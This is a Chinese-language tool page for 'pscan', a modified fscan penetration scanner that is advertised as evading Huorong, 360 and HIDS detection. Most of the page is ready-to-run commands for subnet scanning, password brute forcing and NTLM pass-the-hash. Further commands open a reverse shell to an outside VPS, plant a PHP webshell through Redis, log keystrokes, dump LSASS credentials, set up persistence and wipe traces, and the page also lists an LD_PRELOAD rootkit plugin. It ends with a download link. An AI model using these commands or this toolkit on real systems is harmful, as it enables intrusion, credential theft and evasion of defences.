工具介绍
Fscan 魔改版 — 内网渗透扫描工具。基于 fscan v2.2.0-rc 修改,针对红队场景进行了参数混淆与特征规避。作者:webzzaa
免杀效果
火绒、360可以免杀
魔改说明
本版本对原版 fscan 做了以下修改以规避 HIDS 特征检测:
| 修改项 | 说明 |
|---|---|
| 参数名混淆 | 所有命令行参数重命名(见下方映射表) |
| Banner 静默 | 启动时不输出 fscan ASCII Logo 和版本信息 |
| 模块名重命名 | Go 模块路径改为 scanner/core,去除项目名特征 |
| 预编译二进制 | 提供 pscan.exe 和 core.exe 两个版本 |
原版 ↔ 魔改参数映射:
| 原参数 | 魔改后 | 说明 |
|---|---|---|
-h |
-t |
目标 IP / 网段 / 域名 |
-eh |
-et |
排除主机 |
-ehf |
-etf |
排除主机文件 |
-p |
-tp |
端口 |
-ep |
-etp |
排除端口 |
-hf |
-tf |
主机列表文件 |
-pf |
-tpf |
端口列表文件 |
-m |
-st |
扫描模式 |
-t(线程) |
-tn |
端口扫描线程数 |
-time |
-tm |
超时时间(秒) |
-user |
-usr |
用户名 |
-pwd |
-pw |
密码 |
-usera |
-ua |
额外用户名 |
-pwda |
-pa |
额外密码 |
-userf |
-usrf |
用户名字典文件 |
-pwdf |
-pf |
密码字典文件 |
-upf |
-up |
用户名:密码对文件 |
-hashf |
-hf |
哈希文件 |
-hash |
-hv |
哈希值 |
-domain |
-dm |
域名 |
-sshkey |
-sk |
SSH 私钥 |
使用场景
1. 内网扫描
# 全量扫描整个 C 段(最常用)
pscan.exe -t 192.168.1.0/24
# 仅存活探测(快速定位在线主机)
pscan.exe -t 192.168.1.0/24 -ao
# ICMP 模式存活探测
pscan.exe -t 192.168.1.0/24 -st icmp
# 存活探测 + 仅在线主机做端口扫描(跳过离线主机)
pscan.exe -t 192.168.1.0/24 -ao -st all
# 扫描多个网段
pscan.exe -t 192.168.1.0/24,10.10.0.0/16
# 扫描 IP 范围
pscan.exe -t 192.168.1.1-100
# 排除特定主机
pscan.exe -t 192.168.1.0/24 -et 192.168.1.1,192.168.1.254
# 从文件读取目标列表
pscan.exe -tf targets.txt
2. 端口与协议控制
# 扫描指定端口
pscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379
# 扫描常用 Web 端口
pscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090
# 扫描全部端口(慢,谨慎使用)
pscan.exe -t 192.168.1.0/24 -tp 1-65535 -tn 1000
# 排除特定端口
pscan.exe -t 192.168.1.0/24 -etp 445,139
# 跳过 Ping 探测(纯 TCP 扫描,适合禁 Ping 环境)
pscan.exe -t 192.168.1.0/24 -np
# 跳过 TCP 补充探测
pscan.exe -t 192.168.1.0/24 -ntp
# 调整扫描线程和超时(网络差时降低线程数)
pscan.exe -t 192.168.1.0/24 -tn 200 -tm 5
# 限制发包速率(规避流量检测)
pscan.exe -t 192.168.1.0/24 -rate 1000
3. 弱口令爆破
# 全量扫描 + 自动爆破(默认开启)
pscan.exe -t 192.168.1.0/24
# 禁用爆破(只扫端口和服务识别)
pscan.exe -t 192.168.1.0/24 -nobr
# 指定自定义凭据
pscan.exe -t 192.168.1.0/24 -usr admin -pw admin123
# 使用字典文件
pscan.exe -t 192.168.1.0/24 -usrf users.txt -pf pass.txt
# 使用用户名:密码对文件(每行 user:pass)
pscan.exe -t 192.168.1.0/24 -up creds.txt
# 添加额外用户/密码(与原字典合并)
pscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password
# 指定域名(用于域认证爆破)
pscan.exe -t 192.168.1.0/24 -dm corp.local
# SSH 私钥登录
pscan.exe -t 192.168.1.100 -sk id_rsa
# NTLM 哈希传递
pscan.exe -t 192.168.1.100 -hv "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
4. Web 扫描
# 扫描单个 Web 站点
pscan.exe -u http://192.168.1.100:8080
# 扫描多个 URL
pscan.exe -u http://192.168.1.100 -tp 80,443,8080
# 带 Cookie 扫描
pscan.exe -u http://192.168.1.100 -cookie "PHPSESSID=xxx"
# 使用 HTTP 代理
pscan.exe -u http://192.168.1.100 -proxy http://127.0.0.1:8080
# 使用 SOCKS5 代理
pscan.exe -t 192.168.1.0/24 -socks5 socks5://127.0.0.1:1080
# 指定网卡(VPN 场景)
pscan.exe -t 10.8.0.0/24 -iface 10.8.0.5
5. POC 漏洞检测
# 全量扫描 + POC 检测(默认开启)
pscan.exe -t 192.168.1.0/24
# 禁用 POC 扫描(加快速度)
pscan.exe -t 192.168.1.0/24 -nopoc
# 全量 POC 扫描(更全面但更慢)
pscan.exe -t 192.168.1.0/24 -full
# 指定 POC 名称
pscan.exe -t 192.168.1.100 -pocname thinkphp
# 自定义 POC 脚本目录
pscan.exe -t 192.168.1.100 -pocpath ./custom-pocs/
# 调整 POC 并发数
pscan.exe -t 192.168.1.0/24 -num 10
# 启用 DNSLog
pscan.exe -t 192.168.1.0/24 -dns
6. 凭据复用与哈希传递
# NTLM 哈希传递(配合爆破模块使用)
pscan.exe -t 192.168.1.100 -hv "31d6cfe0d16ae931b73c59d7e0c089c0"
# 哈希文件批量传递
pscan.exe -t 192.168.1.0/24 -hf hashes.txt
# 复用域用户凭据
pscan.exe -t 192.168.1.0/24 -usr administrator -pw P@ssw0rd -dm corp.local
7. 后渗透利用
# 查看所有可用本地插件
pscan.exe -local list
# 收集系统信息
pscan.exe -local systeminfo
# 反弹 Shell(先在外网 VPS 监听)
pscan.exe -local reverseshell -rsh your-vps.com:4444
# 启动正向 Shell(等待目标连接)
pscan.exe -local forwardshell -fsh-port 4444
# 启动 SOCKS5 代理(本地监听 1080)
pscan.exe -local socks5proxy -start-socks5 1080
# Redis 写公钥
pscan.exe -t 192.168.1.100 -st redis -rs "ssh-rsa AAAAB3N..."
# Redis 写 Webshell
pscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc "<?php system($_GET['cmd']);?>"
# 键盘记录
pscan.exe -local keylogger -keylog-output keylog.txt
# LSASS 凭证提取
pscan.exe -local minidump
# Windows 持久化(启动项)
pscan.exe -local winstartup -win-pe C:\shell.exe
# 清理痕迹
pscan.exe -local cleaner
支持的爆破服务
| 服务 | 插件 | 默认端口 |
|---|---|---|
| MySQL | mysql | 3306 |
| MSSQL | mssql | 1433 |
| Oracle | oracle | 1521 |
| PostgreSQL | postgresql | 5432 |
| Redis | redis | 6379 |
| MongoDB | mongodb | 27017 |
| Elasticsearch | elasticsearch | 9200 |
| SSH | ssh | 22 |
| FTP | ftp | 21 |
| Telnet | telnet | 23 |
| SMB | smb | 445 |
| RDP | rdp | 3389 |
| VNC | vnc | 5900 |
| LDAP | ldap | 389 |
| SMTP | smtp | 25 |
| POP3 | pop3 | 110 |
| IMAP | imap | 143 |
| SNMP | snmp | 161(UDP) |
| DNS | dns | 53 |
| Rsync | rsync | 873 |
| Memcached | memcached | 11211 |
| RabbitMQ | rabbitmq | 5672 |
| ActiveMQ | activemq | 61616 |
| Kafka | kafka | 9092 |
| Zookeeper | zookeeper | 2181 |
| Neo4j | neo4j | 7687 |
| Cassandra | cassandra | 9042 |
| MQTT | mqtt | 1883 |
| Modbus | modbus | 502 |
| BACnet | bacnet | 47808 |
| IPMI | ipmi | 623 |
| NetBIOS | netbios | 137-139 |
| NFS | nfs | 2049 |
| RMI | rmi | 1099 |
| JDWP | jdwp | 5005 |
后渗透插件列表
通过 -local 参数调用:
| 插件名 | 功能 | 平台 |
|---|---|---|
systeminfo |
系统信息收集 | 全平台 |
reverseshell |
反弹 Shell | 全平台 |
forwardshell |
正向 Shell | Windows |
socks5proxy |
启动 SOCKS5 代理 | 全平台 |
keylogger |
键盘记录 | Windows |
minidump |
LSASS 凭据提取 | Windows |
sshkey |
SSH 公钥注入 | Linux |
cleaner |
痕迹清理 | 全平台 |
crontask |
Cron 持久化 | Linux |
systemdservice |
Systemd 服务持久化 | Linux |
ldpreload |
LD_PRELOAD Rootkit | Linux |
winregistry |
注册表持久化 | Windows |
winschtask |
计划任务持久化 | Windows |
winservice |
服务持久化 | Windows |
winstartup |
启动项持久化 | Windows |
winlogon |
登录脚本持久化 | Windows |
winwmi |
WMI 持久化 | Windows |
winbits |
BITS 任务持久化 | Windows |
winifeo |
IFEO 持久化 | Windows |
# 列出所有本地插件
pscan.exe -local list
# 使用特定插件
pscan.exe -local systeminfo
WebUI 模式
本工具内置了 Web 管理界面(需使用 web 版本编译)。
# 启动 Web 服务
pscan-web.exe
# 指定监听端口
pscan-web.exe -u
# 启动后访问 http://127.0.0.1:8080
WebUI 功能:
-
图形化扫描任务管理 -
实时 WebSocket 结果推送 -
扫描预设保存 -
资产项目管理 -
多语言支持(中文/English) -
深色模式
工具下载
https://github.com/webzzaa/pscan/tree/main© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
暂无评论内容